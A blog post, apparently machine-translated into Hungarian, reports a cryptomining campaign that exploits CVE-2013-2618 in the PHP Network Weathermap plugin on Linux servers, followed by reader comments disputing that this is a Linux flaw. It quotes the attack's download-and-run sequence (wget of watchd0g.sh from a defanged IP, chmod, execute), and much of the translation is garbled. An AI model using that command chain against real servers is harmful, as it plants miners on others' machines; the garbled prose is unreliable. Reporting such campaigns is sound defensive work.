Ezt a a kriptovaluta bányász távoli számítógépek használatával engedély nélkül ezek tulajdonosainak trendje válik. Már beszéltem erről néhány alkalommal itt, a blogon, ilyen típusú helyzetekről.
És ez az, hogy ez már teljesen kikerült az ellenőrzés alól a kriptopénzek pillanatától meglehetősen jelentős helyet és értéket vettek felAzok az emberek, akik elegendő tudással rendelkeznek ahhoz, hogy hozzáférjenek a biztonságukat sértő számítógépekhez, félretették az időpazarlást fontos információk vagy bankszámlák keresésével, hogy pénzbeli előnyökhöz jussanak.
Ehelyett a legegyszerűbb dolog mellett döntenek, ha átveszik ezeknek a csapatoknak az irányítását és egyesítik őket egy bányahálózatban, valamint más feladatokra is, amelyeket általában a botnettel végeznek.
Ily módon általában inkább újraszámozlak, csak az azonnali pénzre összpontosítanak, amelyet ez generál.
A piaci trendek intelligens megértésével és a kriptográfia megfelelő ismeretével nagy előnyökre tehet szert.
A Linux valóban biztonságos rendszer?
Sokunknak az az elképzelése, hogy a Linux szinte tökéletes biztonságos operációs rendszer, a valóság az, hogy még mindig vannak hibái.
Hát vannéhány nap a TrendMicro talált, amelyben kiderült egy új a Linux rendszerek hibája, amely a hackereknek megadta a kriptovaluták bányászásának előnyét Linux szerverek és gépek használatával.
A blogodon keresztüli nyilatkozatban a következőket kommentálták:
Az incidensekre adott válaszok nyomon követésével behatolási kísérleteket figyeltünk meg, amelyek mutatóit korrelálni tudtuk egy korábbi kriptovaluta bányászati kampánnyal, amely a JenkinsMiner rosszindulatú programot használta.
A különbség: ez a kampány Linux szervereket céloz meg. Ugyancsak klasszikus eset az újrafelhasználott biztonsági rések, amelyek egy elavult biztonsági hibát használnak ki, amelynek javítása már közel öt éve elérhető.
Ebben a kiadásban az elemzésén keresztül sikerült azonosítani az érintett helyeket ezért a kudarcért az Főleg Japánt, Tajvant, Kínát, az Egyesült Államokat és Indiát érinti.
Támadáselemzés
Elemzés útján a Trend Micro Smart Protection Network által részletezzen egy kicsit arról, hogy a támadók hogyan használják ki ezt a hibát:
Ennek a kampánynak az üzemeltetői a CVE-2013-2618-ot használták ki, amely a Camapi Network Weathermap plugin dátumozott biztonsági rése, amelyet a rendszergazdák a hálózati tevékenység vizualizálásához használnak.
Amiért egy régi biztonsági hibát használnak ki: A Network Weathermapnak eddig csak két nyilvánosan jelentett biztonsági rése van, mindkettő 2014 júniusától kezdődően.
Ezek a támadók nemcsak egy olyan biztonsági hibát használhatnak ki, amelyhez rendelkezésre áll egy kihasználás, hanem a javítás késleltetését is, amely a nyílt forráskódú eszközt használó szervezeteknél jelentkezik.
alapvetően a támadás XSS támadással történik:
A fuzzy rész a támadási cél, egy porttal rendelkező webszerver.
A fájl /plugins/weathermap/configs/conn.php az a fájl, amely az XSS elleni folyamatos támadásból származik / plugins / weathermap / php .
Plusz conn.php Kezdetben egy hasonló HTTP kérést látunk a 'nevű oldalra alkalmazva hűvös.php ".
A kriptovaluta bányaprogramot a sérülékenységen keresztül terjesztik a PHP időjárási térképéből olyan célokra, amelyek Linux szerverek
A képen láthatja, hogyan jön létre a támadás, és a következőképpen írja le:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Ez azt jelenti, hogy elküldi a jelzést egy fájl letöltésére wget segítségével, amely egy olyan segédprogram, amelyet szinte az összes Linux disztribúció alapértelmezés szerint telepített.
chmod 775 watchd0g.sh
futtathatóvá teszi a fájlt
./watchd0g.sh
Végül azt teszi, hogy a fájl fusson a szerveren.
Szerencsére, már van egy javítás ( CVE-2013 2618- ) meghibásodásra és Letöltheti -tól ezt a linket
Si többet szeretne tudni róla ennek a kudarcnak a meglátogathatja ezt a linket.
forrás: A cryptocurrency Miner a PHP Weathermap biztonsági résével terjesztett, Linux szervereket céloz meg
Idiótának lenni nem biztonságos, és ennek ellenére a Linux megment.
A biztonsági javítások nem frissítése nem a Linux hibája. Az a hiba, hogy egyes társaságok, hogy pénzt takarítsanak meg, idiótákat vesznek fel rendszergazdaként,
De ennek ellenére AZONNAL FELDEKEDIK és azonnal megoldják, még az ilyen kisebb biztonsági eseményeket is közzéteszik.
És mi a hibája a Linuxnak, hogy a frissítéseit nem alkalmazzák? A GNU / Linux fejlesztők úgy teszik a dolgukat, hogy megoldásokat dolgoznak ki a feltárt sebezhetőségekre, és elérhetővé teszik azokat a felhasználók számára. Ha az orvos influenza elleni oltást ír fel, de nem kapja meg, megbetegszik és megmerevedik ... az orvos hibája?
DesdeLinux no es lo que era, dos noticias seguidas con dos fallos importantes:
1.- A jobb szerkesztők számára a fejlesztés érdekében olyan szoftvert helyeznek el, amely nem szabad szoftver, és elfelejtik azokat, akik vannak (a megjegyzésekben megemlítik őket).
2.- Óriási hírek a vírusokról, amikor csak a NEM FEJLESZTETT szervereket érintik. De ha valamelyik linuxot évtizedek óta alapértelmezés szerint frissítették. Félelmet kelteni, mintha Windows-típusú szívó víruskeresőre lenne szükség. Úgy tűnik, azt próbálják mondani, hogy a Linux ugyanaz, mint a Windows, és nem.
Ha egy hiba régi, és már javításra került, akkor sem hír, sem semmi. Ne játsszon a Microsoft és a víruskereső cégek, például a Trend Micro, a Norton, a Panda vagy a McAffee között, és ne kapjon fizetést.
Egyébként a Trend Micro-t több évig használtuk a társaságban, és ez egy igazi burgonya, egy szar volt, mert a rendszere azt mondta, hogy egy futtatható fájlnak "nyomai" vannak vírusokkal (ami vírus lehet, még ha az is nem), és miért távolította el (egy könyvtárba vitte, hogy ne fusson), nem engedélyezve a használatát, és nem rendelkezett olyan fehér listával, amely feloldaná ezt a viselkedést egy biztonságos futtatható fájllal, amelyet használnunk kellett. Basszus. Ez a vállalati verzió volt, az egyedi változatnak megvan ez az engedélyezőlista lehetősége. Szánalmas.
Ne írd le magad ilyen elegánsan.
A cikk egy biztonsági résről szól, amely lehetővé teszi a program belépését, futtathatóvá tételét és futtatását, amely minden vírusnak el kell terjednie, nyilvánvalóan ahhoz, hogy vírus legyen, amire a beírt programnak szüksége van a kódjába a hálózat számítógépeinek átvizsgálásának lehetősége a művelet megismétlése és az önmásolás érdekében. Nem pontosan azért teszik ezt, mert a Linuxban a feltárt biztonsági lyukakat egy biztonsági javítás fedi, és ezt értem a Windows és a Linux közötti különbségen, mivel antivírusra nincs szükség, hanem a lyuk fedezésére. A Windows rendszerben több okból is nehezebb: 1.- A fájlok egyszerűen kiterjesztésük miatt futtathatóvá válnak, így nincs szükség az érintett számítógépen történő bevezetésükre. 2.- A felhasználók folyamatosan telepítik a kétséges eredetű programokat, mert saját tulajdonúak, és fizetés nélkül is rendelkezniük kell velük (nem mondok semmit, mi lenne egy otthoni gazdaság számára, ha megvásárolnánk az MS Office, Photoshop stb. számítógépes berendezések költségei). 3.- Előbb vagy utóbb a Windows kiürül, a felhasználó elviszi a szomszédhoz, baráthoz ... maga a javítás kémprogramot tesz. Lehet, hogy nem az, és remek, de lehet, hogy van, és van egy Windows, amely kémleli a jelszavait. A cikkben megemlítik a bevezetési rendszert a sebezhetőség által érintett linuxban, így az a program, amely automatikusan átvizsgálja a hálózatot, és azt felhasználja önmagának másolásához és a szerveren történő futtatásához, a mindennek a legkönnyebb része, ezért a a cikk minden vírus legfontosabb lépése: a rendszer támadással szembeni sebezhetőségének ismerete.
Rossz információ. Ez nem hiba a Linuxban, hanem egy PHP ALKALMAZÁS hibája, vagyis többplatformos. Még a linux kernelt futtató rendszerek számára sem kizárólagos! De még akkor is, ha az alkalmazás nem platformokon átívelő, nem Linux-hiba lenne, csupán alkalmazás.
A Linux kernel a legkisebb mértékben sem avatkozik be az ilyen helyszíni parancsfájl-támadások elleni védekezésbe. Legalább vizsgálja meg ÖT PERCET a közzététel előtt, mert az az igazság, hogy annak, aki valamiről tud valamit, rosszul fog kinézni.